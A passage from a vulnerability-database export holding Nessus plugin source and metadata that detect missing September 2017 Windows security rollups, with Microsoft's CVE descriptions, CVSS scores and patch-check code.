checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103132);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8737\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8749\",\n \"CVE-2017-8759\"\n );\n script_xref(name:\"MSKB\", value:\"4038786\");\n script_xref(name:\"MSFT\", value:\"MS17-4038786\");\n script_xref(name:\"MSKB\", value:\"4038799\");\n script_xref(name:\"MSFT\", value:\"MS17-4038799\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Windows Server 2012 September 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038786\nor cumulative update 4038799. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. \n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038786/windows-server-2012-update-kb4038786\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?91b2bd74\");\n # https://support.microsoft.com/en-us/help/4038799/windows-server-2012-update-kb4038799\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?35364720\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4038786 or Cumulative update KB4038799.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038786', '4038799');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038786, 4038799])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:34:39", "description": "The remote Windows host is missing security update 4038779 or cumulative update 4038777. It is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. The attacker can then monitor and read the traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. The update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681, CVE-2017-8684, CVE-2017-8685)\n\n - An Information disclosure vulnerability exists in Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8688)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8696)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists in the Windows System Information Console when it improperly parses XML input containing a reference to an external entity. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity (XXE) declaration. To exploit the vulnerability, an attacker could create a file containing specially crafted XML content and convince an authenticated user to open the file. The update addresses the vulnerability by modifying the way that the Windows System Information Console parses XML input.\n (CVE-2017-8710)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. To exploit the vulnerability, the user must either browse to a malicious website or be redirected to it. In an email attack scenario, an attacker could send an email message in an attempt to convince the user to click a link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. (CVE-2017-8529)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "Windows 7 and Windows Server 2008 R2 September 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-8529", "CVE-2017-8628", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8680", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8684", "CVE-2017-8685", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8695", "CVE-2017-8696", "CVE-2017-8699", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8710", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8733", "CVE-2017-8736", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750"], "modified": "2020-11-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038777.NASL", "href": "https://www.tenable.com/plugins/nessus/103127", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103127);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/02\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8628\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8685\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8695\",\n \"CVE-2017-8696\",\n \"CVE-2017-8699\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8710\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8733\",\n \"CVE-2017-8736\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\"\n );\n script_bugtraq_id(\n 98953,\n 100720,\n 100722,\n 100724,\n 100727,\n 100728,\n 100736,\n 100737,\n 100742,\n 100743,\n 100744,\n 100752,\n 100755,\n 100756,\n 100764,\n 100765,\n 100766,\n 100767,\n 100769,\n 100770,\n 100771,\n 100772,\n 100773,\n 100780,\n 100781,\n 100782,\n 100783,\n 100790,\n 100791,\n 100792,\n 100793,\n 100803,\n 100804\n );\n\n script_xref(name:\"MSKB\", value:\"4038779\");\n script_xref(name:\"MSFT\", value:\"MS17-4038779\");\n script_xref(name:\"MSKB\", value:\"4038777\");\n script_xref(name:\"MSFT\", value:\"MS17-4038777\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 September 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038779\nor cumulative update 4038777. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n (CVE-2017-8628)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684, CVE-2017-8685)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8696)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console when it improperly\n parses XML input containing a reference to an external\n entity. An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. To exploit the\n vulnerability, an attacker could create a file\n containing specially crafted XML content and convince an\n authenticated user to open the file. The update\n addresses the vulnerability by modifying the way that\n the Windows System Information Console parses XML input.\n (CVE-2017-8710)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038779/windows-7-update-kb4038779\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bf7e8b94\");\n # https://support.microsoft.com/en-us/help/4038777/windows-7-update-kb4038777\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1dbb18cc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4038779 or Cumulative update KB4038777\nas well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8682\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n 